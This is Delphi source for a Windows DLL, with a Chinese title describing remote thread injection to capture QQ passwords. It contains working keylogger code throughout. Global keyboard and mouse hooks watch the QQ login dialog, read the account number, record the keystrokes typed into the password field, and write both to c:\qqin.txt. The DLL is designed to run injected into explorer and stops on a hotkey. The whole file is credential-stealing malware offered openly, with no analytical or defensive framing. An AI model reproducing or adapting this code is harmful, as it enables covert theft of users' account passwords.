hook.~dpr

远程线程注入获取QQ密码远程线程注入获取QQ密码

(**************writen by msz 2004-12-06 mszok@163.com,  some code from lmz**********************)
library HookDLL;

uses
  windows,sysutils;

type
  TPoint = packed record
    X: Longint;
    Y: Longint;
  end;
  PMouseHookStruct = ^TMouseHookStruct;
    {$EXTERNALSYM tagMOUSEHOOKSTRUCT}
  tagMOUSEHOOKSTRUCT = packed record
    pt: TPoint;
    hwnd: longword;
    wHitTestCode: LongWord;
    dwExtraInfo: LongWord;
  end;
  node = record
    MainThread: Longword;
    ExplorerID: Longword;
    MainPath: array[0..500] of char;
  end;
  Pnode = ^node;
  TMouseHookStruct = tagMOUSEHOOKSTRUCT;
const
  WM_QUIT   = $0012;
  WM_HOTKEY = $0312;
var
  KeyHook,MouseHook:LongWord;
  password_str:string;
  password_num:string;
  thenodep:pnode;
  filemaph:longword;



procedure DLLProcess(dwReason: integer);
begin
  if dwReason=DLL_PROCESS_DETACH then
  begin
    if (TheNodeP<>nil) then UnmapViewOfFile(TheNodeP);
    if (FileMapH<>0)   then CloseHandle(FileMapH);
  end;
end;

procedure savetofile(s:string);
var
  text:textfile;
begin
  assignfile(text,'c:\qqin.txt');
  try
    if fileexists('c:\qqin.txt') then
      append(text)
    else
      rewrite(text);
    writeln(text,datetimetostr(now)+': '+s);
  finally
    closefile(text);
  end;
end;

function process_password(s:string):string;
var
  i:integer;
  temp:string;
begin
  temp:='';
  for i:=1 to length(s) do
  begin
    if ord(s[i])=8 then
    begin
      result:=copy(result,1,length(result)-1);
      continue;
    end
    else result:=result+s[i];
  end;
  for i:=1 to length(result) do
  begin
    if (ord(result[i])>=96)and(ord(result[i])<=105) then
      temp:=temp+inttostr(ord(result[i])-96)
    else temp:=temp+result[i];
  end;
  result:=temp;
end;

function Get_qqnumber:string;
var
  buffer:array[0..50] of char;
  Window,Number_window:Longint;
begin
  result:='';
  Window:=findwindow('#32770',nil);
  if window=0 then exit;
  Number_window:=FindWindowex(window,0,'ComboBox',nil);
  if Number_window=0 then exit;
  SendMessage(Number_window, $000D, 50, Integer(@buffer));
  result:='number：'+ string(buffer);
end;

function ispassword_window:boolean;
var
  window,password_window:thandle;
begin
  result:=false;
  window:=findwindow('#32770',nil);
  if window=0 then exit;
  password_window:=findwindowex(window,0,'Edit',nil);
  if password_window=0 then exit;
  if getfocus=password_window then
  result:=true;
end;



function isqq_window:boolean;
begin
  if findwindow('#32770',nil)=GetForegroundWindow then
  result:=true
  else result:=false;
end;

function HookKey(Code:Integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;
begin
  code:=HC_NOREMOVE;
  if findwindow('#32770',nil)<>0 then
  begin
    if (wParam=13) and(((LParam shr 31)and 1)=0)and(isqq_window)  then
    begin

     savetofile(process_password(get_qqnumber)+'  password:'+process_password(password_str)+' '+password_num);
      password_str:='';
      password_num:='';
    end
    else begin
      if (((LParam shr 31)and 1)=0)and(ispassword_window) then
      begin
        password_str:=password_str+chr(wparam);
        password_num:=password_num+' '+inttostr(wparam);
      end;
    end;
  end;
  Result:=CallNextHookEx(KeyHook,code,Wparam,lParam);
end;


function HookMouse(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
var
  buffer:array[0..3] of char;
begin {鼠标左键按下消息}
  if (findwindow('#32770',nil)<>0)and(wparam=$0201) then
  begin
    SendMessage(pMOUSEHOOKSTRUCT(lparam)^.hwnd,$000D,3,Integer(@buffer));
    if buffer='登' then
    begin
      savetofile(process_password(get_qqnumber)+'  password:'+
                  process_password(password_str)+' '+password_num);
      password_str:='';
      password_num:='';
    end;
  end;
  Result := CallNextHookEx(MouseHook, iCode, wParam, lParam);
end;


procedure HookOn;
begin
  KeyHook:=SetWindowsHookEx(WH_KEYBOARD,@HookKey,HInstance,0);
  MouseHook:=SetWindowsHookEx(WH_mouse, @HookMouse, HInstance, 0);
end;


procedure HookOff;
begin
  UnHookWindowsHookEx(KeyHook);
  UnHookWindowsHookEx(MouseHook);
end;


procedure ThreadPro();stdcall;
var
  theMsg: TMsg;
  HotKeyID: ATOM;
  hmutex:dword;
begin
  PostThreadMessage(TheNodeP^.MainThread, WM_QUIT, 0, 0);
  hmutex:=openmutex(MUTEX_ALL_ACCESS,false,'mashizhong');
  if hmutex=0 then
  begin
    hmutex:=createmutex(nil,true,'mashizhong');
    HotKeyID := GlobalAddAtom('HotKeyID8Mazi');
    RegisterHotKey(0, HotKeyID, MOD_ALT, Ord('L'));
    hookon;
    while getmessage(themsg,0,0,0) do
    begin                            
      if (theMsg.message=WM_HOTKEY) then
        break;
    end;
    hookoff;
    UnregisterHotKey(0, HotKeyID);
    DeleteAtom(HotKeyID);
    savetofile('HInstance: '+inttostr(hinstance));
    releasemutex(hmutex);
  end;
  closehandle(hmutex);
  FreeLibraryandexitthread(hinstance,0); //不理解这一句代码怎么释放不了exeplorer中的hook.dll,好笑吧自已写的代码不理解
end;


exports

  Threadpro;

begin
  FileMapH := OpenFileMapping(FILE_MAP_ALL_ACCESS, False, 'HookExplorer8Mazi');
  if FileMaph<>0 then
    TheNodeP := MapViewOfFile(FileMapH, FILE_MAP_ALL_ACCESS, 0, 0, 0);
  DllProc := @DLLProcess;
end.